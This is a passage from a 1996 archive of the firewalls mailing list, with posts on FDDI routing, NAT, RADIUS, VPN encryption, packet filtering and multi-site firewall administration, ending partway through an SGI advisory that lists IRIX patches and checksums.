SMTP id GAA00179 for ; Wed, 3 Jan 1996 06:35:02 -0800 (PST) Received: from cclink.logicon.com (cclink-out.logicon.com) by logicon.com (5.0/SMI-4.2) id AA17280; Wed, 3 Jan 96 06:50:16 PST Received: from cc:Mail by cclink.logicon.com id AA820680065; Wed, 03 Jan 96 08:59:10 PST Date: Wed, 03 Jan 96 08:59:10 PST From: "Grady, Pat" Message-Id: <9600038206.AA820680065@cclink.logicon.com> To: pablo@smartlink.net, Rabid Wombat Cc: firewalls@GreatCircle.COM Subject: Re[2]: ipx-bridging & ip-routing Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually, 25 Mbps on 100Mbps FDDI is pretty good--the bottleneck is usually the overhead and handshakes of the network protocol. ______________________________ Reply Separator _________________________________ Subject: Re: ipx-bridging & ip-routing Author: Rabid Wombat at INTERNET-MAIL Date: 1/2/96 5:45 PM My guess is that the PC bus will be the bottleneck. I've ran PC servers on FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than about 25 Mb/s stuffed into the box. I haven't looked into this lately; PCI may have a higher raw capacity. If you are expecting to be using the FDDI to capacity you may be outa luck using a PC. Hope this is of some use. I'd be glad to hear from someone who's done this successfully. > > Thanks in advance! > > paul > > > From firewalls-owner Wed Jan 3 06:52:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA00304 for firewalls-outgoing; Wed, 3 Jan 1996 06:46:08 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA00299 for ; Wed, 3 Jan 1996 06:46:04 -0800 (PST) Date: Wed, 3 Jan 1996 9:45:24 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: proff@suburbia.net CC: firewalls@greatcircle.com Message-Id: <960103094524.2020153c@hobbes.orl.mmc.com> Subject: RE: Compression is useful - but for security, not Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I rote >> 1) Compression aids performance. It does not aid security (at best is SBO). Julian wresponded: >Not so! Compressed plain text, which is then ciphered is several orders >of magnitude harder to break (depending on the compression scheme and attack). Any cipher scheme that is effectively strengthened by compression is not very good encryption IMNSHO. True, if you use a rearranged XXENCODE table as your cipher scheme, compression will make it more difficult to break (provided you remove the headers). Triple DES or SKIPJACK is hard enough to break that comression makes no effective difference. Warmly, Padgett From firewalls-owner Wed Jan 3 07:07:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA29817 for firewalls-outgoing; Wed, 3 Jan 1996 06:13:04 -0800 (PST) Received: from hawk.tml.co.za (hawk.tml.co.za [196.4.87.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA29811 for ; Wed, 3 Jan 1996 06:12:45 -0800 (PST) Received: from gavin.tml.co.za (gavin.tml.co.za [196.4.87.114]) by hawk.tml.co.za (8.6.12/8.6.12) with SMTP id QAA11830 for ; Wed, 3 Jan 1996 16:12:14 -0200 Received: by gavin.tml.co.za with Microsoft Mail id <01BAD96C.4B588DE0@gavin.tml.co.za>; Tue, 2 Jan 1996 23:44:44 +-200 Message-ID: <01BAD96C.4B588DE0@gavin.tml.co.za> From: Gavin Ferreiro To: "'firewalls@GreatCircle.COM'" Subject: FW: ipx-bridging & ip-routing Date: Tue, 2 Jan 1996 23:44:38 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If speed is very important, seeing that you have 2 FDDI rings, the most = efficient and effective way to route betewwn the rings is with a Router. = The speed obtained from a dedicated router as aposed to a router that = has been made out of a HOST is astonomical. Rather user the correct = equipment for the task. It will in my experience save you a lot of = trouble in the end. ---------- From: Paul Ferguson[SMTP:pferguso@cisco.com] Sent: Wednesday, January 03, 1996 02:06 To: Shaw Innes Cc: Rabid Wombat; Pablo; firewalls@GreatCircle.COM Subject: Re: ipx-bridging & ip-routing Is there some reason why a router is not being considered? It would appear to be a natural choice... - paul At 09:00 PM 1/3/96 +1000, Shaw Innes wrote: >On Mon, 1 Jan 1996, Rabid Wombat wrote: > >> My guess is that the PC bus will be the bottleneck. I've ran PC = servers on=20 >> FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than = >> about 25 Mb/s stuffed into the box. I haven't looked into this = lately;=20 >> PCI may have a higher raw capacity. If you are expecting to be using = the=20 >> FDDI to capacity you may be outa luck using a PC. >>=20 >> Hope this is of some use. I'd be glad to hear from someone who's done = >> this successfully. > >I don't really know an awful lot about fddi, but I could see that a PC=20 >would cause a bottleneck at 100mb/s also. However, I have noticed that = >there exists Linux for, mips, sparc and alpha architectures. Hence if=20 >the PC was causing a bottleneck, surely you could buy a sun and run = linux=20 >on the sun, using the sun's faster bus to route/bridge the packets? > >Perhaps not... this is just a theory > >Regards, > Shaw > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 = ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m = s From firewalls-owner Wed Jan 3 07:28:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA00968 for firewalls-outgoing; Wed, 3 Jan 1996 07:14:16 -0800 (PST) Received: from sasami.jurai.net (sasami.jurai.net [205.218.122.51]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA00938 for ; Wed, 3 Jan 1996 07:14:09 -0800 (PST) From: scanner@jurai.net Received: (from scanner@localhost) by sasami.jurai.net (8.6.11/8.6.9) id JAA10585; Wed, 3 Jan 1996 09:14:29 -0600 Date: Wed, 3 Jan 1996 09:14:29 -0600 (CST) To: Rabid Wombat cc: firewalls@GreatCircle.COM Subject: Re: rfi Radius In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 Jan 1996, Rabid Wombat wrote: > > Is anyone out there using Radius w/ Portmasters? I'd be interested in > getting informed opinions, as I'm considering implementing it. Since it > uses encrypted sessions, can the system serving as a firewall also serve > as the Radius host, or is this opening a hole? We are using radius on on our livingston. we just finished it and are working on getting our lan online. (new ISP) If you want I can send you some config files and the like that we use just let me know. The encryption seems to be strong and hold its own. but i do suggest not using the database on the portmaster. I was informed its not wise. but other than that it seems pretty good. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Chris Watson % Scanner@jurai.net % 1(908)367-8030 x126 % Networking & Computer Security Expert % Webspan Networking % Lakewood, NJ % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzA7IoEAAAEH/2EPSOUsZ+hSxh3zGwtYvuaIjCzMU/TOz8z2RoKAubcJ+IlQ YVfG3RTiShlqsNnKSYKJbvOxF1OzkCicGl+XlodcWuXR3BmUrnpm45+oGIx6IUJ4 xkO6Ce7K5bT024jFkBXoL8csLdPmHDBlZtL4Y5uh8yXLMHSpJUMPT+hEGjuiFY48 E8Gox46Jti0oBxF9AtnZChsf1asMXrNiGgfRuWYgBjwB2lMW/co3XgvUw+JK2jSt MK3FhJSgSBpSeoq4K1pyEBboXXbV5/xD2rLgxJVBAxARpIDhaIQdOpRHENIGuwvl FhMzNOAqkJG6eAMJAdFMVXtgGvotuuEikpZD3oEABRG0IENocmlzIFdhdHNvbiA8 c2Nhbm5lckBqdXJhaS5uZXQ+ =yI5B -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Wed Jan 3 07:52:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA01563 for firewalls-outgoing; Wed, 3 Jan 1996 07:38:29 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA01522 for ; Wed, 3 Jan 1996 07:38:19 -0800 (PST) Received: from nessie.mcc.ac.uk by relay2.UU.NET with ESMTP id QQzwxy12211; Wed, 3 Jan 1996 10:36:02 -0500 (EST) Received: from utserv.mcc.ac.uk by nessie.mcc.ac.uk with SMTP (PP); Wed, 3 Jan 1996 15:12:47 +0000 Received: from xen.mcc.ac.uk (actually xen-eth.mcc.ac.uk) by utserv.mcc.ac.uk with SMTP (PP); Wed, 3 Jan 1996 15:12:24 +0000 Date: Wed, 3 Jan 1996 15:12:19 +0000 (GMT) From: Patrick Myers To: Firewalls@GreatCircle.COM Subject: Network Address Translation In-Reply-To: <199601022338.PAA06132@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a requirement for software to do NAT (Network Address Translation) where the ip addresses of systems on a local LAN are translated to different addresses on another interface (connected to the internet). I know that some firewall software has this facility, does anyone know of any other (non-firewall) software that will do this translation, preferably low cost (or free) and possibly to run on a Linux system? Thanks in advance -- Patrick Myers Manchester Computing | Email: p.j.myers@mcc.ac.uk University of Manchester | Tel: +44 (0)161 275 6016 Oxford Road | Mob: +44 (0)973 73 55 11 Manchester M13 9PL | Fax: +44 (0)161 275 6040 From firewalls-owner Wed Jan 3 08:07:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA01186 for firewalls-outgoing; Wed, 3 Jan 1996 07:24:36 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA01181 for ; Wed, 3 Jan 1996 07:24:30 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA13309; Wed, 3 Jan 96 09:25:55 CST Received: by mnbp.network.com with Microsoft Mail id <30EA9F55@mnbp.network.com>; Wed, 03 Jan 96 09:23:01 CST From: Craig McLellan To: firewalls Subject: RE: firewall encryption information Date: Wed, 03 Jan 96 09:22:00 CST Message-Id: <30EA9F55@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You should also look at Network Systems Borderguard Access Router. Provides DES, 3xDES, IDEA and NSC1 as well as MD5 and Dif-Hell (sic). Costs start around 2.3K with one LAN and one WAN (V.35). RGRDS....clm ---------- From: firewalls-owner To: firewalls Subject: firewall encryption information Date: 2 January, 1996 17:18 A few questions about firewalls setting up virtual private networks. - for Gauntlet; what is the encryption algorithm used and what is the key size for session keys? - for Eagle; what is the key size used for DES encryption? - for Firewall-1; what is the key size used for DES encryption? -- chris From firewalls-owner Wed Jan 3 08:10:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA01191 for firewalls-outgoing; Wed, 3 Jan 1996 07:25:03 -0800 (PST) Received: from nessie.mcc.ac.uk (nessie.mcc.ac.uk [130.88.200.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA00946 for ; Wed, 3 Jan 1996 07:14:10 -0800 (PST) Received: from utserv.mcc.ac.uk by nessie.mcc.ac.uk with SMTP (PP); Wed, 3 Jan 1996 15:12:47 +0000 Received: from xen.mcc.ac.uk (actually xen-eth.mcc.ac.uk) by utserv.mcc.ac.uk with SMTP (PP); Wed, 3 Jan 1996 15:12:24 +0000 Date: Wed, 3 Jan 1996 15:12:19 +0000 (GMT) From: Patrick Myers To: Firewalls@GreatCircle.COM Subject: Network Address Translation In-Reply-To: <199601022338.PAA06132@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a requirement for software to do NAT (Network Address Translation) where the ip addresses of systems on a local LAN are translated to different addresses on another interface (connected to the internet). I know that some firewall software has this facility, does anyone know of any other (non-firewall) software that will do this translation, preferably low cost (or free) and possibly to run on a Linux system? Thanks in advance -- Patrick Myers Manchester Computing | Email: p.j.myers@mcc.ac.uk University of Manchester | Tel: +44 (0)161 275 6016 Oxford Road | Mob: +44 (0)973 73 55 11 Manchester M13 9PL | Fax: +44 (0)161 275 6040 From firewalls-owner Wed Jan 3 10:22:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA04716 for firewalls-outgoing; Wed, 3 Jan 1996 10:09:06 -0800 (PST) Received: from NUki (nuki.netuse.de [193.98.110.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA04705 for ; Wed, 3 Jan 1996 10:09:02 -0800 (PST) Received: by Mail.NetUSE.de (SMail3.1.28.1 #2) ID m0tXXg4-0009AaC: Wed, 3 Jan 96 19:12 MET Received: by white.schulung.netuse.de (Smail3.1.29.0 #2) id m0tXUWu-0008xkC; Wed, 3 Jan 96 15:51 MET Received: from GATEWAY by white.schulung.netuse.de with netnews for firewalls@greatcircle.com (firewalls@greatcircle.com) To: firewalls@greatcircle.com Date: Wed, 3 Jan 1996 14:45:33 GMT From: kris@schulung.netuse.de (=?ISO-8859-1?Q?Kristian_K=F6hntopp?=) Message-ID: Organization: =?ISO-8859-1?Q?entf=E4llt?= References: <199601022338.PAA06132@miles.greatcircle.com> Subject: Re: Type enforcement vs chroot and buffers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Firewalls@GreatCircle.COM writes: >That's not significantly better in terms of security, since it's all >or nothing. To be any use it'd have to be something like "/dev/tcp/25" >and so on... This would still be useless of course, unless you can do "chown mail /dev/tcp/25" and it actually changes permissions on this socket. This is trivial of course, but I mention it anyway because of the Linux procfs, which does not allow inode write access, thus giving you no advantage SUID-wise. Kristian -- Kristian Koehntopp, Wassilystrasse 30, 24113 Kiel, +49 431 688897 >>Bald wird auch AOL unsere GABELN sperren muessen. Man nennt das "Security by Obscenity".<< -- Peter Berlich in de.talk.bizarre From firewalls-owner Wed Jan 3 10:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA05349 for firewalls-outgoing; Wed, 3 Jan 1996 10:21:58 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA05344 for ; Wed, 3 Jan 1996 10:21:53 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id NAA04350; Wed, 3 Jan 1996 13:19:08 -0500 Date: Wed, 3 Jan 1996 13:19:05 -0500 (EST) From: Rabid Wombat To: Paul Ferguson cc: Shaw Innes , Pablo , firewalls@GreatCircle.COM Subject: Re: ipx-bridging & ip-routing In-Reply-To: <199601031205.EAA07234@lint.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm not sure what the requestor's requirements are; only that he asked if a PC running LINUX could route TCP/IP and bridge IPX between two FDDI rings. A router would seem to be the natural choice, although this _is_ the firewalls list, so he might have some additional concerns. ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Wed, 3 Jan 1996, Paul Ferguson wrote: > Is there some reason why a router is not being considered? It would > appear to be a natural choice... > > - paul > > > At 09:00 PM 1/3/96 +1000, Shaw Innes wrote: > > >On Mon, 1 Jan 1996, Rabid Wombat wrote: > > > >> My guess is that the PC bus will be the bottleneck. I've ran PC servers on > >> FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than > >> about 25 Mb/s stuffed into the box. I haven't looked into this lately; > >> PCI may have a higher raw capacity. If you are expecting to be using the > >> FDDI to capacity you may be outa luck using a PC. > >> > >> Hope this is of some use. I'd be glad to hear from someone who's done > >> this successfully. > > > >I don't really know an awful lot about fddi, but I could see that a PC > >would cause a bottleneck at 100mb/s also. However, I have noticed that > >there exists Linux for, mips, sparc and alpha architectures. Hence if > >the PC was causing a bottleneck, surely you could buy a sun and run linux > >on the sun, using the sun's faster bus to route/bridge the packets? > > > >Perhaps not... this is just a theory > > > >Regards, > > Shaw > > > > -- > Paul Ferguson || || > Consulting Engineering || || > Reston, Virginia USA |||| |||| > tel: +1.703.716.9538 ..:||||||:..:||||||:.. > e-mail: pferguso@cisco.com c i s c o S y s t e m s > > From firewalls-owner Wed Jan 3 11:07:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA07315 for firewalls-outgoing; Wed, 3 Jan 1996 11:03:22 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA07286 for ; Wed, 3 Jan 1996 11:03:15 -0800 (PST) Received: by relay.ashton.csc.com; id OAA19023; Wed, 3 Jan 1996 14:02:26 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma019019; Wed, 3 Jan 96 14:01:59 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id OAA03467; Wed, 3 Jan 1996 14:15:16 -0500 From: Chris Kostick Message-Id: <199601031915.OAA03467@mccoy.ashton.csc.com> Subject: s/key digest algorithm on Firewall-1 To: firewalls@greatcircle.com, skey-users@thumper.bellcore.com Date: Wed, 3 Jan 1996 14:15:15 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know the digest algorithm used with the S/Key implementation on Firewall-1. It doesn't seem to be MD4 or MD5. I have an s/key implmentation for both and it never generates the same list as the one generated on Firewall-1. -- Chris From firewalls-owner Wed Jan 3 11:22:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA07937 for firewalls-outgoing; Wed, 3 Jan 1996 11:15:23 -0800 (PST) Received: from relay.tis.com (relay.tis.com [192.94.214.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA07920 for ; Wed, 3 Jan 1996 11:15:18 -0800 (PST) Received: by relay.tis.com; id JAA11799; Wed, 3 Jan 1996 09:20:28 -0500 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.3) id xma011794; Wed, 3 Jan 96 09:20:27 -0500 Received: from jupiter.tis.com by tis.com (4.1/SUN-5.64) id AA08614; Wed, 3 Jan 96 14:12:40 EST Date: Wed, 3 Jan 96 14:12:40 EST From: Jody C Patilla Message-Id: <9601031912.AA08614@tis.com> To: firewalls@GreatCircle.COM Subject: Livingston Firewall IRX router Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does it use static or dynamic (or stateful, if you prefer) packet filtering? The product info is unclear on this point. I'd be interested in hearing any of your experiences with it, especially in connection with high-use Web servers on inside or outside segments. I'd also like to know more about how fine-grained the filtering is (and how easy to set up), say, compared with a Cisco. thanks - jcp ========================================================================= Jody C. Patilla jcp@tis.com Trusted Information Systems Glenwood, Md. From firewalls-owner Wed Jan 3 12:52:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA09673 for firewalls-outgoing; Wed, 3 Jan 1996 12:39:36 -0800 (PST) Received: from gateway.upj.com (gateway.upj.com [146.240.240.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA09661 for ; Wed, 3 Jan 1996 12:39:31 -0800 (PST) Received: from basil.upj.com by gateway.upj.com with SMTP id AA25440 (InterLock SMTP Gateway 3.0 for ); Wed, 3 Jan 1996 15:37:26 -0500 Received: by basil.upj.com (5.0/SMI-SVR4) id AA15160; Wed, 3 Jan 1996 15:31:46 +0500 Date: Wed, 3 Jan 1996 15:31:46 +0500 From: telomas@upj.com (Timothy E. Lomas ) Message-Id: <9601032031.AA15160@basil.upj.com> To: Firewalls@GreatCircle.com Subject: Firewalls in Many Countries X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Pharmacia and Upjohn Companies merged last November. We are merging/changing the firewalls and Internet access points within the company. How do you do that and still give adequate service levels? We have queried our ISP and only received vague answers. It has been hard for me to find knowledgeable people within companies that understand firewalls, security issues and network issues. I am a strong proponent of local administration because I do not see how you can provide adequate response time to serious problems if the people that are supporting the firewall or if the vendor that supports the firewall is across the ocean. However, others within our new company think that centralization of firewall support and firewalls is critical. There is also a group that feels does not want to "pay" for the external IP traffic running across the internal network if adequate security can be provided by adding additional firewalls. KEY QUESTIONS: How many firewalls and Internet sites of access should we have and how should they be supported? Select and support one firewall vendor? Local versus remote administration? Service Level: Respond to security problems immediately, and fix technical problems within 24 hours. Therefore, even mail could be down at a site for 24 hours although this seems like a long time to me. Management is very sensitive to the idea of the Internet and because of this, investigating unknown problems is a high priority. Users: We have a current or potential Internet user population of over 1000 users in Uppsala, Sweden; Milan, Italy; Kalamazoo, Michigan (USA); and Tsukuba, Japan. There are many other smaller sites that do (or will) receive Internet access by using the firewalls. Firewalls: We currently have two firewalls for Internet access: Kalamazoo (firewall is ANS Interlock - Solaris) Uppsala (firewall is Dec Seal). We will probably add a third in Japan shortly. Services allowed: Outbound FTP, TELNET, HTTP and of course smtp for mail. A few additional services are being piloted but have not yet been approved (WinCIM for Compuserve; SciFinder for access to an external database. Essentially anyone who has been given a TCP/IP address on an authorized network can obtain access to Internet services. TCP/IP addresses: We have one class B address and multiple class C's. From firewalls-owner Wed Jan 3 13:22:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA10594 for firewalls-outgoing; Wed, 3 Jan 1996 13:12:50 -0800 (PST) Received: from usagroup.com ([198.70.128.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA10589 for ; Wed, 3 Jan 1996 13:12:40 -0800 (PST) Received: from DOMAIN-E-Message_Server by usagroup.com with Novell_GroupWise; Wed, 03 Jan 1996 16:11:29 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 03 Jan 1996 16:14:41 -0600 From: David Leonard To: firewalls@greatcircle.com Subject: Router Config Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are in the process of configuring our firewall and I have a question on the router access lists. Currently, we do not allow UPD to pass through our router except for DNS traffic. However, are experiencing denies when we change servers. Therefore, I have received a request to allow UDP for any port greater than 1023 to pass through our router. In addition, we have a Raptor Firewall between our internal network and the router in question. What, if any, are the exposures for allowing this type of traffic through our router? Any assistance will be greatly appreciated. I was also wondering if anyone could recommend a good book on router security. From firewalls-owner Wed Jan 3 13:37:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA10414 for firewalls-outgoing; Wed, 3 Jan 1996 13:11:17 -0800 (PST) Received: from uni.ins.com (uni.ins.com [199.0.193.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA10387 for ; Wed, 3 Jan 1996 13:11:02 -0800 (PST) Received: (from kron@localhost) by uni.ins.com (8.6.12/8.6.12) id NAA05372; Wed, 3 Jan 1996 13:10:08 -0800 From: Kenneth Kron Message-Id: <199601032110.NAA05372@uni.ins.com> Subject: Re: Livingston Firewall IRX router To: jcp@tis.com (Jody C Patilla) Date: Wed, 3 Jan 96 13:10:08 PST Cc: firewalls@GreatCircle.COM In-Reply-To: <9601031912.AA08614@tis.com>; from "Jody C Patilla" at Jan 3, 96 2:12 pm X-Mailer: ELM [version 2.3 PL6] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In the spirit of teaching you to fish... The way to answer this question for your self is fairly simple. Does it allow you to open a hole for ... 1) outbound only UPD connections (DNS, NFS, etc.) UDP is connectionless so attempting to impose this requires statefulness. 2) outbound only non-passive ftp. FTP requires a back chanel on a random port... 3) Does the marketing literature/documentation specificaly state that it is stateful (or dynamic). The degree to which it performs 1 & 2 will give you your real answer 3 is just a sanity check if you will. If it's statefull at all it will probably be touted as such somewhere. For example one stateful product has a section called "Stateful Multi-Layer Inspection Technology". As far as the livingston IRX router I really don't know as I haven't used it. =================== Kenneth Kron Information Security Consultant Kenneth_Kron@ins.com > > > Does it use static or dynamic (or stateful, if you prefer) packet filtering? > The product info is unclear on this point. I'd be interested in hearing > any of your experiences with it, especially in connection with high-use > Web servers on inside or outside segments. I'd also like to know more about > how fine-grained the filtering is (and how easy to set up), say, compared > with a Cisco. > > thanks - > > jcp > > ========================================================================= > Jody C. Patilla jcp@tis.com > Trusted Information Systems Glenwood, Md. > > From firewalls-owner Wed Jan 3 14:56:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA13048 for firewalls-outgoing; Wed, 3 Jan 1996 14:34:49 -0800 (PST) Received: from sgigate.sgi.com (sgigate.SGI.COM [204.94.209.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA12843 for ; Wed, 3 Jan 1996 14:33:38 -0800 (PST) Received: from sgihub.corp.sgi.com by sgigate.sgi.com via ESMTP (950911.SGI.8.6.12.PATCH825/940406.SGI) id OAA10084; Wed, 3 Jan 1996 14:32:51 -0800 Received: from rock.csd.sgi.com by sgihub.corp.sgi.com via ESMTP (950511.SGI.8.6.12.PATCH526/911001.SGI) id OAA25072; Wed, 3 Jan 1996 14:32:50 -0800 Received: from boytoy.csd.sgi.com by rock.csd.sgi.com via ESMTP (940816.SGI.8.6.9/910805.SGI) id OAA12979; Wed, 3 Jan 1996 14:32:48 -0800 Received: by boytoy.csd.sgi.com (950511.SGI.8.6.12.PATCH526/911001.SGI) id OAA03022; Wed, 3 Jan 1996 14:32:35 -0800 From: "SGI Security Coordinator" Message-Id: <9601031432.ZM3020@boytoy.csd.sgi.com> Date: Wed, 3 Jan 1996 14:32:32 -0800 X-Mailer: Z-Mail-SGI (3.2S.2 10apr95 MediaMail) To: agent99@sgihub.corp.sgi.com Subject: SGI Security Advisory 19960101-01-PX Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FOR PUBLIC RELEASE -----BEGIN PGP SIGNED MESSAGE----- ________________________________________________________________________________ Silicon Graphics Inc. Security Advisory Title: Object Server Vulnerability Number: 19960101-01-PX Date: January 3, 1996 ________________________________________________________________________________ Silicon Graphics provides this information freely to the SGI community for its consideration, interpretation and implementation. Silicon Graphics recommends that this information be acted upon as soon as possible. Silicon Graphics will not be liable for any consequential damages arising from the use of, or failure to use or use properly, any of the instructions or information in this Security Advisory. ________________________________________________________________________________ As part of Silicon Graphics continued security improvement efforts, Silicon Graphics has discovered a security vulnerability within the object server program used in the IRIX 5.x and IRIX 6.x operating systems. SGI has investigated this issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL SGI systems running IRIX 5.2, 5.3, 6.0, 6.0.1 and 6.1. This issue will be corrected in future releases of IRIX. - -------------- - --- Impact --- - -------------- Provided with the correct network configuration and SGI environment, both local and remote users may be able to become root on a targeted SGI system. - ---------------- - --- Solution --- - ---------------- The solution for this issue is a replacement of the object server program and assistant programs for those versions that are vulnerable. The following patches have been generated for those versions vulnerable and are freely provided to the SGI community. **** IRIX 3.x **** This version of IRIX is not vulnerable. No action is required. **** IRIX 4.x **** This version of IRIX is not vulnerable. No action is required. **** IRIX 5.0.x, 5.1.x **** For the IRIX operating systems versions 5.0.x, 5.1.x, an upgrade to 5.2 or better is required first. When the upgrade is completed, then the patches described in the next sections "**** IRIX 5.2, 6.0, 6.0.1 ***" or "**** IRIX 5.3 ****" or "**** IRIX 6.1 ****" can be applied depending on the final version of upgrade. **** IRIX 5.2, 6.0, 6.0.1 **** For the IRIX operating system versions 5.2, 6.0, and 6.0.1, an inst-able patch has been generated and made available via anonymous ftp and/or your service/support provider. The patch is number 1052 and will only install on IRIX versions 5.2, 6.0, and 6.0.1 . The SGI anonymous ftp site is sgigate.sgi.com (204.94.209.1). Patch 1052 can be found in the following directories on the ftp server: ~ftp/Security or ~ftp/Patches/5.2 ~ftp/Patches/6.0 ~ftp/Patches/6.0.1 ##### Checksums #### The actual patch will be a tar file containing the following files: Filename: README.patch.1052 Algorithm #1 (sum -r): 16512 8 README.patch.1052 Algorithm #2 (sum): 59284 8 README.patch.1052 MD5 checksum: 4E8FA3A3305C68BC18EC52564C6B2AED Filename: patchSG0001052 Algorithm #1 (sum -r): 51587 1 patchSG0001052 Algorithm #2 (sum): 32069 1 patchSG0001052 MD5 checksum: E0E3487A8A36A8B854BD704E35CA7245 Filename: patchSG0001052.cadmin_sw Algorithm #1 (sum -r): 63062 548 patchSG0001052.cadmin_sw Algorithm #2 (sum): 51720 548 patchSG0001052.cadmin_sw MD5 checksum: E8612BF40C60DBC9D7A90FAC6F8EF102 Filename: patchSG0001052.idb Algorithm #1 (sum -r): 07247 1 patchSG0001052.idb Algorithm #2 (sum): 40615 1 patchSG0001052.idb MD5 checksum: 580F688D98950F250BF47AC82EB91FFB **** IRIX 5.3 **** For the 5.3 IRIX operating system, an inst-able patch has been generated and made available via anonymous ftp and/or your service/support provider. The patch is number 1048 and will only install on IRIX 5.3 . The SGI anonymous ftp site is sgigate.sgi.com (204.94.209.1). Patch 1048 can be found in the following directories on the ftp server: ~ftp/Security or ~ftp/Patches/5.3 ##### Checksums #### The actual patch will be a tar file containing the following files: Filename: README.patch.1048 Algorithm #1 (sum -r): 37177 9 README.patch.1048 Algorithm #2 (sum): 1825 9 README.patch.1048 MD5 checksum: D0CE2B1132B417F3B9215AA9F85CA073 Filename: patchSG0001048 Algorithm #1 (sum -r): 42189 4 patchSG0001048 Algorithm #2 (sum): 56038 4 patchSG0001048 MD5 checksum: 